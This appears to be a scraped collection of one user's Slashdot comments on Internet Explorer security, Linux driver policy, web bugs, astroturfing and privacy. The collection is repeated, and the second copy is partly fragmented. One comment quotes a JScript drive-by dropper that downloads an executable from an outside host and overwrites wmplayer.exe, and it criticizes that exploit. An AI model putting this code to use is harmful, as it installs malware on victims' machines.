I'm not sure what to make of this. I visited Europe several times in the past few years with my Uncle Tim. I'll admit the water in Scottland tasted abit funny but the place didn't strike me as acidic
Rosanne? Rosanne Rosanna-Danna?
Oh... Nevermind.
(Slashdot readers born after 1975, please Google on "Gilda Radner".)
Firefox, the browser, doesn't support ActiveX or VBScript. It supports JavaScript instead. The latter runs in a sandbox which prevents it from writing files to disk without specific permission.
The exploit in the html isn't running VB; it's running (Microsoft's implementation of) javascript, which can instantiate and call functions on ActiveX objects. You can see this in this snippet of the code, which is called (indirectly) by the java function (document.all.code.value is the contents of a hidden text box, suitably escaped by the function preparecode).
(And contrary to a prior post of mine, my Proxomitron setup would have caught this, as it replaces any occurrence of "setTimeOut" with "noSetTimeOut" which isn't a javascript function and therefore never runs.)
Plus I like looking at a dark terminal when reading mail.
Personally, when reading email I prefer looking into a dark monolith that's full of star for pixels.
Unfortunately, that doesn't run under cygwin because it's forever off-limits to us: while all the other worlds are ours, the monolith's on Europa, and we can attempt no landings there.
The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?
Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.
No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!
Go to web-site, get a new OS!
And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?
To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".
Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.
I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.
I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.
Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.
I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.
What the hell?
The decay bateria are hungry!
on
Space Burial
·
· Score: 5, Interesting
Science seems convinced that in the early universe, only the elements with the lowest atomic weight -- hydrogen, helium, perhaps a few others -- existed.
Denser elements come into being for millions of years, until the very oldest stars first burnt out, then re-ignited by burning heavy elements, until finally bursting in novas and flinging heavier elements out into the universe.
After many many such novas, eventually enough of these heavier elements were produced to coalesce and form our sun and its planets. One of the heavier elements -- carbon, some 12 times heavier than fundamental element hydrogen -- conveniently arranges itself into the benzene rings of six atoms that are the scaffold for all Earthly life. It is because of this that Carl Sagan said that we were all made of star-stuff.
And after all that work of billions of years to collect heavy elements here on Earth, you want to just throw away all that
> Why prevent closed source drivers from using certain kernel functions?
It prevents the kernel maintainers from wasting their time trying to debug a problem that may be caused by a module for which they have no source and no hope of fixing.
Next week on Saturday Night Live:
LINUX USER JIMMY (Played by Horatio Sanz): "I want to use the Yoyodyne USB Blender on my linux box, so I can make margaritas over dial-up SSH!"
KERNEL DEVELOPER (played by Chris Parnell): "If we let the blender driver call kernel_foobar(), it might work flawlessly."
LINUX USER JIMMY: "OK great! Linux r0x0r5!"
KERNEL DEVELOPER (dourly) "But... it some cases, it might fail."
LINUX USER JIMMY: "But it'll usually work? I can't wait to taste those margaritas!"
KERNEL DEVELOPER: "No, Jimmy" (shakes head and sighs) "it will never work, because we don't allow the Yoyodyne driver to call kernel_foobar()." (pause) "It might fail, and we can't allow that to happen. (nods authoritatively, looking Jimmy in the eyes) You understand."
LINUX USER JIMMY: "So I can't make my margaritas if I use linux?"
KERNEL DEVELOPER: "No, Jimmy, you can't. Because we kernel developers know better."
Re:Pharmaceutical Industry?
on
Cyberchondria
·
· Score: 5, Funny
If you've ever felt depressed, disappointed, been discouraged, or have in any way failed to any extent in any endeavor you have ever attempted, ask your doctor about Lobotomol.
Some kernel developers (me included) don't like the idea of making functions in the kernel available for use by closed source drivers. This way the module loader prevents certain modules from using certain functions.
I feel like getting flamed and losing some karma. It's the day after Valentine's anyway, so it's not like I was expecting to be happy anyway.
Why prevent closed source drivers from using certain kernel functions?
Sure, I realize it makes a political point to closed source developers: "your code will remain second-class code until you show us the source", but like a SPEWS blacklist, it does that by annoying innocent third parties in the hopes of getting the third parties to join you in your complaints.
In this case the innocent third parties are the people running linux. So linux users get punished by linux developers for "consorting" with the "enemy's" closed source drivers. Ironically, at the same time, linux is promoted as the OS that allows the user full control over his computer.
If you really believe in the user's right to run his PC as he wishes, let him decide whether or not to buy closed-source hardware.
If you don't, then say so: "I'm giving you the benefit of my code, and I'm not charging for it, but it's not really free, as I expect you to adopt my ideology to use it, and to let me dictate to some degree how you use your PC." That's a valid and defensible stance -- but it's a different stance than is usually professed.
And admit that it's a barrier to wider-spread adoption of linux, and factor it in when asked why more people are not using linux.
the article is just a bit too techie for me.. so whats [sic] the catch with this new stuff? will it help some more device manufacturers make "drivers" for linux?
New device driver format. Is it good or is it whack?
Basically, the article is explaining that by following certain conventions in the driver code, you allow the kernel a standardized way to load and use the driver.
In other words, if you're going to make third-party Legos, make sure the nubbins on the blocks are the same size and wit the same spacing as the nubbins on Legos, if you want everything to fit together.
The author of the article then inserts a plug for his company's software:
If you are not using an integrated development environment such as TimeSys' TimeStorm that is capable of detecting kernel versions and automatically creating Makefiles that "do the right thing" for the 2.6 kernel, you will need to manually create Makefiles for your device drivers that are integrated into the kernel build process.
He also explains that in cleaning up driver building for 2.6, somebody forgot that not everybody has write access to a copy of the kernel source, which 2.6 driver building -- whoops -- requires. This is simpler to get around, so long as you've got room for your own writable copy of the kernel source. This will prove annoying for people who build drivers by compiling them on certain *cough* Zaurus *cough* embedded devices (rather than cross-compiling) and who use something like cramfs.
The article then spends a few paragraphs on where the real compatibility problems will be: 2.6 is lot different than 2.4 in a lot of internal processes, so if your driver made assumptions about any of that -- instead of being itself written in a layered way -- you're going to be making a lot of changes.
(Ideally, you should write the driver so that one layer handles communication with linux, one layer handles communication with hardware, and one layer sits between the other two to "translate" and maintain state; this also makes porting the driver -- whether to 2.6 or another operating system altogether, -- far cheaper and easier. Programmer laziness, management short-sightness, or pre-mature optimization may however have driven you to write a monolithic driver.)
Will this help more manufacturers make drivers for linux? Not really. If manufacturers cared about making linux drivers, they'd have already done it for 2.4. If they didn't care to do it for 2.4, they won't care to do it for 2.6.
If you really want more manufacturers to make drivers, you have to do the following: get the phone number for investor relations at the company. Call up and ask them how much market share they've lost by not offering linux drivers, and explain that you're worried about the company's long-term prospects if it continues to ignore this growing market. explain that as a result you're going to be reducing you exposure in the company's stock in favor of their competitors who do offer linux drivers.
(Since most companies are now run by managers whose compensation is based on short-term stock movement, and not long tern company growth, the companies hare increasingly deaf to the needs of customers, but alert to stock speculators and their stock price. Therefore I now recommend calling Investor Relations rather than Customer Relations if you wish to change a company's policies.)
The diamond industry (mining, cutting, and selling) is quite large. Is it possible they can convince governments to regulate the man-made ones, and have them somehow marked to allow people to note the difference?
The synthetic diamond manufacturers have already agreed in principle to mark their diamonds. The one firm will engrave some acronym (what, I've forgotten), and the other is in discussions as to what to engrave.
But this idea you have that an industry would lobby government to prevent what's essentially generic competition is ridiculous.
I mean, the legislature would never write, the executive would never sign, laws to, for instance, force you buy a printer manufacturer's *cough* Lexmark *cough* replacement cartridges by calling generic replacements a violation of some Draconian Misapplied Copyright Abuse.
Well, this site isn't much better: I'm posting this without account, but my IP address is logged, even though I'm supposed to be an ANONYMOUS coward.
Not to mention that Slashdot also adds auditing code to the posting page that uses a web bug. Fortunately, as you'll see below , Proxomintron eats web bugs (well, replaces them with a local file).
<!-- image audit code --> <script LANGUAGE="JAVASCRIPT"> <!-- now = new Date(); tail = now.getTime(); document.write(" <Match: Block Web Bugs > <--- this isn't part of the page, it's Proxomintron's debug output, showing it found a web bug. In order to not mess up page layout, Proxomitron using a replacement image <IMG SRC='http://images-aud.slashdot.org/pc.gif?l,"); document.write(tail); document.write("' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '> </Match> <-- what follows from here is Proxomitron's replacement for what it matched. <IMG src=file:///X|/Program%20Files/Proxomitron%20Naoko -4/ProxN45j/html\clear.gif document.write(tail); document.write("' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '>");//--> </SCRIPT> <noscript>
<Match: Block Web Bugs > <-- the Slashdot page make provision for people not using javascript, but Proxomintron sees this alternative bug too <IMG SRC='http://images-aud.slashdot.org/pc.gif?l,111' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '> </Match> <IMG src=file:///X|/Program%20Files/Proxomitron%20Naoko -4/ProxN45j/html\clear.gif WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '> </noscript> <!-- end audit code -->
I've done the same [given email addresses that incorporate the web site's name to web sites asking for email addresses] for several years, and find that none of the spam I've ever checked has come from a web site.
Me too. If a web site wants my address it's always website.tld@mydomain.tld.
And like you, I've almost never gotten spam back -- the only mail to these addresses is from the web sites I've given them to.
But. Let's adjust our tinfoil hats....;)
Does that mean that the we sites don't sell the email addresses they get to third parties, or does it mean they don't sell the addresses that contain their site name, and would serve to tip off where a spammer got the address?
OOC, where does that phrase (astroturfing) come from? I don't think I've seen it before.
Astroturf is the fake grass used in (American) football stadiums -- especially those with roofs -- in place of real grass, because it's more durable and doesn't require sunlight or watering.
A "grass root" action or campaign is one that is started spontaneously, and is largely sustained, by private persons, as opposed to politicians, corporations, or public relations firms; a "grass roots" campaign comes about because of the popular feelings of some mass of people, as opposed to being the creature of the powerful.
"Astroturfing", then, is a campaign crafted by politicians or spin-doctors, but in such a way as to appear it's the result of popular feeling rather than crafty manipulation by political or corporate elites.
Astroturfing to one degree or another is increasing common in American politics (and business). In reaction to the (often correct) cynicism that politicians and corporations are not acting in the best interests of "the people", an astroturfing campaign attempts to gain legitimacy by appearing to spring forth spontaneously from "the people", like Athena from Zeus's forehead; when it's discovered that the campaign was meticulously crafted and manipulated by the same spin-meisters that public has learned to distrust, the astroiturfing adds to the very cynicism it was designed to circumvent.
One technique of an astroturfing campaign is to induce a number of its supporters to write email, letters to the editor, or in this case, Amazon reviews, in support of the campaign's goals. The campaign instructs the supporters on what to say, how to say it, and where send it, and above all, to make it appear that their indignation, appreciation, joy, or hate is entirely spontaneous and independent -- and thus "real" -- and not at all the product of an orchestrated campaign.
The idea is that the public at large will see lots of apparently "uncoordinated", "spontaneous" and "objective" viewpoints all in line with that of the astroturfing campaign, and will come to believe that if so many of their fellow "citizens next door" believe something, they should believe it too, for all those "independent" viewpoints couldn't have been faked.
With the advent of the internet, it's become even easier to whip up an astroturfing campaign, as the cost of emailing -- especially of emailing a pre-written, sign your name at the bottom email -- is so low. Anonymity, as in the Amazin case, makes it even easier, as one person can play the role of a whole group of like-minded people.
TIf you use it anyway, you are a felon. This crime is far worse than rape or murder, because it strikes at the heart of the system of natural incentives which drives our free economy.
I knewthat John Ashcroft is a conservative Pentecostal Christian.
And I knew that Hillary Rosen is a liberal (apparently Jewish) lesbian.
What I didn't know was that despite their differences, they managed to mate and have a baby who posts to Slashdot.
I think geeks should unite and play up the "sign of the beast" angle, that way the fundamentalist christian crazies will resist it, and hence the republican party....:)
But in all seriousness folks, this would probably backfire. The Fundamentalist Christians support the state of Israel precisely because they expect Armageddon to start there, and -- according to their Holy Book -- Armageddon has to happen before Christ returns to reward the Fundies.
That Armageddon is supposed to leave Israel hip deep in blood is one of those regrettably necessary evils. It'll be th blood of the Jews and the Muslims, not the Fundies. The Fundies will rule for 1000 years at the side of Christ, or rise bodily into heaven or however it is their Sky-Ghost is supposed to reward them.
Since another Sign of the "End Times" is the ubiquitous appearance of the Mark of the Best on foreheads or hands everywhere, I wouldn't be surprised to see Fundies being all for it, on the theory that the sooner the Beast comes, the sooner Christ follows.
Not only can we speak English in Canada, we can even spell personnel. You're of English descent... learn the language!
Yeouch. I'm embarrassed. In my defense, I do know the difference, but I type pretty badly, and tend to automatically accept the first choice the spell checker gives to typo'd words.
It makes no sense for a business not to sell you something because you refuse to provide personal information. If I were a business owner, I'd sell my products to anybody that was willing to offer cash. I see businesses all the time refusing to sell to some segment of the population, and I find that truly bizarre.
Yeah, it is truly bizarre -- if the business is making money off the product.
Sometimes, the business is making -- or plans to make -- the majority of its money off selling your name or your "eyeballs" (viewership).
Some MBA has convinced ShopShack that the real money is in selling its customers to other businesses, and MBAstard realizes that you just want to make the purchase and get on with your life. So a policy is made that the shop won't sell without getting your information, wagering that, having waited in the check-out line, rather than go to the trouble to buy elsewhere, you'll just do as you're told like a good little consumer.
The only effective response to this is to make the cost of doing this as high as possible for the business by
Arguing the point at the point of sale, and refusing to relinquish your position in line. This will win you the ire of the customers behind you in line, but if you're lucky, it'll also convince some of them that going to that store isn't worth having to deal with trouble-makers like you standing on principle;
and then making a fuss that pulls in the store manger, wasting his time too, and explaining to him precisely why his times being wasted without his in fact making a sale or getting the information;
followed up by a call to the store's corporate headquarters explaining that you'll be happy to share your information as soon as whomever you're talking to shares his and the company's president's home phone number too.
It's not easy, and it's not convenient, but if you want to keep your privacy, you need to make it uncomfortable and costly for those who want to take it from you. make it costly enough, and the stores will stop doing this crap.
Re:What the law says and what's done in practice .
on
Canadian Privacy Act
·
· Score: 0, Troll
here in Germany we have very tough laws with regard to your personal information and how it must be handled by businesses and the government
Yeah, under that law only ex-Stasi officers are allowed to know where the file folders went.
I site I administer got Slashdotted back in December. The story was posted on a Sunday.
Here's the platform summary for that day:
1. Geeks are also more likely to lie in their HTTP User-Agent header, either to work around sites that petulantly detect the browser and refuse to function if they don't like it (like my bank, which works fine in Moz* but insists it doesn't), or to frustrate sites that attempt exploits based n the browser, or just for the hell of it.
2. I run Windows 2K. But I consider myself a more or less linux user, because do a lot of work in bash running under cygwin, and I'm trying to get coLinux up and running. Using Windows or linux is not political activity for me; I use what is most convenient to me, and Windows makes for a decent GUI experience, especially if you replace all Windows apps with Open source equivalents.
Slashdot Mirror
I'm not sure what to make of this. I visited Europe several times in the past few years with my Uncle Tim. I'll admit the water in Scottland tasted abit funny but the place didn't strike me as acidic
... Nevermind.
Rosanne? Rosanne Rosanna-Danna?
Oh
(Slashdot readers born after 1975, please Google on "Gilda Radner".)
But I wouldn't want to live there. You try building a house in an acid field.
I'm afraid you can't even visit.
Please follow the directions inscribed on the handy black monolith:
"ALL THESE WORLDS ARE YOURS--EXCEPT EUROPA. ATTEMPT NO LANDINGS THERE."
Guess what, Mozilla has a similar "feature". It's called XMLHTTPRequest.... There's also a Mozilla API execute method under the File object.
.jar files?
OK, it's a bit unsettling that a FireHedgeHog extension hard-codes a request to its author's page.
But still, it's in an extension that the user affirmatively installed.
Can XMLHTTPRequest and File.execute be used in javascript loaded into the browser from a web site/ file, or only from installed
If the former, yes, it's a problem. If it can only be called form installed jars, I'm less worried.
The exploit in the html isn't running VB; it's running (Microsoft's implementation of) javascript, which can instantiate and call functions on ActiveX objects. You can see this in this snippet of the code, which is called (indirectly) by the java function (document.all.code.value is the contents of a hidden text box, suitably escaped by the function preparecode).(And contrary to a prior post of mine, my Proxomitron setup would have caught this, as it replaces any occurrence of "setTimeOut" with "noSetTimeOut" which isn't a javascript function and therefore never runs.)
Plus I like looking at a dark terminal when reading mail.
Personally, when reading email I prefer looking into a dark monolith that's full of star for pixels.
Unfortunately, that doesn't run under cygwin because it's forever off-limits to us: while all the other worlds are ours, the monolith's on Europa, and we can attempt no landings there.
Maybe I can get Thumderbird to show... naw.
Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.
No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!
Go to web-site, get a new OS!
And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?
To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".
Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.
I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.
I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.
Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.
I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.
What the hell?
Denser elements come into being for millions of years, until the very oldest stars first burnt out, then re-ignited by burning heavy elements, until finally bursting in novas and flinging heavier elements out into the universe.
After many many such novas, eventually enough of these heavier elements were produced to coalesce and form our sun and its planets. One of the heavier elements -- carbon, some 12 times heavier than fundamental element hydrogen -- conveniently arranges itself into the benzene rings of six atoms that are the scaffold for all Earthly life. It is because of this that Carl Sagan said that we were all made of star-stuff.
And after all that work of billions of years to collect heavy elements here on Earth, you want to just throw away all that by shooting it into space?
Learn to recycle, fer cryin' out loud!
> Why prevent closed source drivers from using certain kernel functions?
It prevents the kernel maintainers from wasting their time trying to debug a problem that may be caused by a module for which they have no source and no hope of fixing.
Next week on Saturday Night Live:
LINUX USER JIMMY (Played by Horatio Sanz): "I want to use the Yoyodyne USB Blender on my linux box, so I can make margaritas over dial-up SSH!"
KERNEL DEVELOPER (played by Chris Parnell): "If we let the blender driver call kernel_foobar(), it might work flawlessly."
LINUX USER JIMMY: "OK great! Linux r0x0r5!"
KERNEL DEVELOPER (dourly) "But... it some cases, it might fail."
LINUX USER JIMMY: "But it'll usually work? I can't wait to taste those margaritas!"
KERNEL DEVELOPER: "No, Jimmy" (shakes head and sighs) "it will never work, because we don't allow the Yoyodyne driver to call kernel_foobar()." (pause) "It might fail, and we can't allow that to happen. (nods authoritatively, looking Jimmy in the eyes) You understand."
LINUX USER JIMMY: "So I can't make my margaritas if I use linux?"
KERNEL DEVELOPER: "No, Jimmy, you can't. Because we kernel developers know better."
If you've ever felt depressed, disappointed, been discouraged, or have in any way failed to any extent in any endeavor you have ever attempted, ask your doctor about Lobotomol.
I... didn't... get...
my... last... comment...
modded... up...
to... +5....
I'm a... failure...
will... Lobotomol (TM)
help me?
Some kernel developers (me included) don't like the idea of making functions in the kernel available for use by closed source drivers. This way the module loader prevents certain modules from using certain functions.
I feel like getting flamed and losing some karma. It's the day after Valentine's anyway, so it's not like I was expecting to be happy anyway.
Why prevent closed source drivers from using certain kernel functions?
Sure, I realize it makes a political point to closed source developers: "your code will remain second-class code until you show us the source", but like a SPEWS blacklist, it does that by annoying innocent third parties in the hopes of getting the third parties to join you in your complaints.
In this case the innocent third parties are the people running linux. So linux users get punished by linux developers for "consorting" with the "enemy's" closed source drivers. Ironically, at the same time, linux is promoted as the OS that allows the user full control over his computer.
If you really believe in the user's right to run his PC as he wishes, let him decide whether or not to buy closed-source hardware.
If you don't, then say so: "I'm giving you the benefit of my code, and I'm not charging for it, but it's not really free, as I expect you to adopt my ideology to use it, and to let me dictate to some degree how you use your PC." That's a valid and defensible stance -- but it's a different stance than is usually professed.
And admit that it's a barrier to wider-spread adoption of linux, and factor it in when asked why more people are not using linux.
will it help some more device manufacturers make "drivers" for linux?
New device driver format. Is it good or is it whack?
Basically, the article is explaining that by following certain conventions in the driver code, you allow the kernel a standardized way to load and use the driver.
In other words, if you're going to make third-party Legos, make sure the nubbins on the blocks are the same size and wit the same spacing as the nubbins on Legos, if you want everything to fit together.
The author of the article then inserts a plug for his company's software:
He also explains that in cleaning up driver building for 2.6, somebody forgot that not everybody has write access to a copy of the kernel source, which 2.6 driver building -- whoops -- requires. This is simpler to get around, so long as you've got room for your own writable copy of the kernel source. This will prove annoying for people who build drivers by compiling them on certain *cough* Zaurus *cough* embedded devices (rather than cross-compiling) and who use something like cramfs.
The article then spends a few paragraphs on where the real compatibility problems will be: 2.6 is lot different than 2.4 in a lot of internal processes, so if your driver made assumptions about any of that -- instead of being itself written in a layered way -- you're going to be making a lot of changes.
(Ideally, you should write the driver so that one layer handles communication with linux, one layer handles communication with hardware, and one layer sits between the other two to "translate" and maintain state; this also makes porting the driver -- whether to 2.6 or another operating system altogether, -- far cheaper and easier. Programmer laziness, management short-sightness, or pre-mature optimization may however have driven you to write a monolithic driver.)
Will this help more manufacturers make drivers for linux? Not really. If manufacturers cared about making linux drivers, they'd have already done it for 2.4. If they didn't care to do it for 2.4, they won't care to do it for 2.6.
If you really want more manufacturers to make drivers, you have to do the following: get the phone number for investor relations at the company. Call up and ask them how much market share they've lost by not offering linux drivers, and explain that you're worried about the company's long-term prospects if it continues to ignore this growing market. explain that as a result you're going to be reducing you exposure in the company's stock in favor of their competitors who do offer linux drivers.
(Since most companies are now run by managers whose compensation is based on short-term stock movement, and not long tern company growth, the companies hare increasingly deaf to the needs of customers, but alert to stock speculators and their stock price. Therefore I now recommend calling Investor Relations rather than Customer Relations if you wish to change a company's policies.)
The diamond industry (mining, cutting, and selling) is quite large. Is it possible they can convince governments to regulate the man-made ones, and have them somehow marked to allow people to note the difference?
The synthetic diamond manufacturers have already agreed in principle to mark their diamonds. The one firm will engrave some acronym (what, I've forgotten), and the other is in discussions as to what to engrave.
But this idea you have that an industry would lobby government to prevent what's essentially generic competition is ridiculous.
I mean, the legislature would never write, the executive would never sign, laws to, for instance, force you buy a printer manufacturer's *cough* Lexmark *cough* replacement cartridges by calling generic replacements a violation of some Draconian Misapplied Copyright Abuse.
That's unpossible!
Great comment, but I have one nit to pick:
;)
Nit added to the Wikipedia astroturfing page.
Now go and edit what I wrote there.
That's a great write up. You should add it to Wikipedia's Astroturfing entry.
;)
Hey, thanks!
Ok, I added it, with the caveat that's it's rough and less stiff than my usual form for Wikipedia entries.
Now watch as some mod comes along, sees the prior post with the Wikipedia astroturfing url, and mods me as a plagiarist.
Well, this site isn't much better: I'm posting this without account, but my IP address is logged, even though I'm supposed to be an ANONYMOUS coward.
document.write(tail);o -4/ProxN45j/html\clear.gif document.write(tail); //-->
o -4/ProxN45j/html\clear.gif WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '>
Not to mention that Slashdot also adds auditing code to the posting page that uses a web bug. Fortunately, as you'll see below , Proxomintron eats web bugs (well, replaces them with a local file).
<!-- image audit code -->
<script LANGUAGE="JAVASCRIPT">
<!--
now = new Date();
tail = now.getTime();
document.write("
<Match: Block Web Bugs > <--- this isn't part of the page, it's Proxomintron's debug output, showing it found a web bug. In order to not mess up page layout, Proxomitron using a replacement image
<IMG SRC='http://images-aud.slashdot.org/pc.gif?l,");
document.write("' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '>
</Match> <-- what follows from here is Proxomitron's replacement for what it matched.
<IMG src=file:///X|/Program%20Files/Proxomitron%20Naok
document.write("' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '>");
</SCRIPT>
<noscript>
<Match: Block Web Bugs > <-- the Slashdot page make provision for people not using javascript, but Proxomintron sees this alternative bug too
<IMG SRC='http://images-aud.slashdot.org/pc.gif?l,111' WIDTH=1 HEIGHT=1 BORDER=0 ALT=' '>
</Match>
<IMG src=file:///X|/Program%20Files/Proxomitron%20Naok
</noscript>
<!-- end audit code -->
I've done the same [given email addresses that incorporate the web site's name to web sites asking for email addresses] for several years, and find that none of the spam I've ever checked has come from a web site.
;)
Me too. If a web site wants my address it's always website.tld@mydomain.tld.
And like you, I've almost never gotten spam back -- the only mail to these addresses is from the web sites I've given them to.
But. Let's adjust our tinfoil hats....
Does that mean that the we sites don't sell the email addresses they get to third parties, or does it mean they don't sell the addresses that contain their site name, and would serve to tip off where a spammer got the address?
OOC, where does that phrase (astroturfing) come from? I don't think I've seen it before.
Astroturf is the fake grass used in (American) football stadiums -- especially those with roofs -- in place of real grass, because it's more durable and doesn't require sunlight or watering.
A "grass root" action or campaign is one that is started spontaneously, and is largely sustained, by private persons, as opposed to politicians, corporations, or public relations firms; a "grass roots" campaign comes about because of the popular feelings of some mass of people, as opposed to being the creature of the powerful.
"Astroturfing", then, is a campaign crafted by politicians or spin-doctors, but in such a way as to appear it's the result of popular feeling rather than crafty manipulation by political or corporate elites.
Astroturfing to one degree or another is increasing common in American politics (and business). In reaction to the (often correct) cynicism that politicians and corporations are not acting in the best interests of "the people", an astroturfing campaign attempts to gain legitimacy by appearing to spring forth spontaneously from "the people", like Athena from Zeus's forehead; when it's discovered that the campaign was meticulously crafted and manipulated by the same spin-meisters that public has learned to distrust, the astroiturfing adds to the very cynicism it was designed to circumvent.
One technique of an astroturfing campaign is to induce a number of its supporters to write email, letters to the editor, or in this case, Amazon reviews, in support of the campaign's goals. The campaign instructs the supporters on what to say, how to say it, and where send it, and above all, to make it appear that their indignation, appreciation, joy, or hate is entirely spontaneous and independent -- and thus "real" -- and not at all the product of an orchestrated campaign.
The idea is that the public at large will see lots of apparently "uncoordinated", "spontaneous" and "objective" viewpoints all in line with that of the astroturfing campaign, and will come to believe that if so many of their fellow "citizens next door" believe something, they should believe it too, for all those "independent" viewpoints couldn't have been faked.
With the advent of the internet, it's become even easier to whip up an astroturfing campaign, as the cost of emailing -- especially of emailing a pre-written, sign your name at the bottom email -- is so low. Anonymity, as in the Amazin case, makes it even easier, as one person can play the role of a whole group of like-minded people.
TIf you use it anyway, you are a felon. This crime is far worse than rape or murder, because it strikes at the heart of the system of natural incentives which drives our free economy.
I knewthat John Ashcroft is a conservative Pentecostal Christian.
And I knew that Hillary Rosen is a liberal (apparently Jewish) lesbian.
What I didn't know was that despite their differences, they managed to mate and have a baby who posts to Slashdot.
Mod the RIAAReichsBaby +5 funny.
But I'm allergic to chemical 37, and to Big Brother.
I think geeks should unite and play up the "sign of the beast" angle, that way the fundamentalist christian crazies will resist it, and hence the republican party.... :)
But in all seriousness folks, this would probably backfire. The Fundamentalist Christians support the state of Israel precisely because they expect Armageddon to start there, and -- according to their Holy Book -- Armageddon has to happen before Christ returns to reward the Fundies.
That Armageddon is supposed to leave Israel hip deep in blood is one of those regrettably necessary evils. It'll be th blood of the Jews and the Muslims, not the Fundies. The Fundies will rule for 1000 years at the side of Christ, or rise bodily into heaven or however it is their Sky-Ghost is supposed to reward them.
Since another Sign of the "End Times" is the ubiquitous appearance of the Mark of the Best on foreheads or hands everywhere, I wouldn't be surprised to see Fundies being all for it, on the theory that the sooner the Beast comes, the sooner Christ follows.
Not only can we speak English in Canada, we can even spell personnel. You're of English descent... learn the language!
Yeouch. I'm embarrassed. In my defense, I do know the difference, but I type pretty badly, and tend to automatically accept the first choice the spell checker gives to typo'd words.
But still, embarrassing.
Thanks for teh heads-up.
I just wanted you to know that I -- unlike certain other replyers -- actually got the joke about the world becoming turned upside down. Thank you.
No, thank you.
Just call me Lord Cornwallis.
Yeah, it is truly bizarre -- if the business is making money off the product.
Sometimes, the business is making -- or plans to make -- the majority of its money off selling your name or your "eyeballs" (viewership).
Some MBA has convinced ShopShack that the real money is in selling its customers to other businesses, and MBAstard realizes that you just want to make the purchase and get on with your life. So a policy is made that the shop won't sell without getting your information, wagering that, having waited in the check-out line, rather than go to the trouble to buy elsewhere, you'll just do as you're told like a good little consumer.
The only effective response to this is to make the cost of doing this as high as possible for the business by
It's not easy, and it's not convenient, but if you want to keep your privacy, you need to make it uncomfortable and costly for those who want to take it from you. make it costly enough, and the stores will stop doing this crap.
here in Germany we have very tough laws with regard to your personal information and how it must be handled by businesses and the government
Yeah, under that law only ex-Stasi officers are allowed to know where the file folders went.
I site I administer got Slashdotted back in December. The story was posted on a Sunday.
Here's the platform summary for that day:
1. Geeks are also more likely to lie in their HTTP User-Agent header, either to work around sites that petulantly detect the browser and refuse to function if they don't like it (like my bank, which works fine in Moz* but insists it doesn't), or to frustrate sites that attempt exploits based n the browser, or just for the hell of it.
2. I run Windows 2K. But I consider myself a more or less linux user, because do a lot of work in bash running under cygwin, and I'm trying to get coLinux up and running. Using Windows or linux is not political activity for me; I use what is most convenient to me, and Windows makes for a decent GUI experience, especially if you replace all Windows apps with Open source equivalents.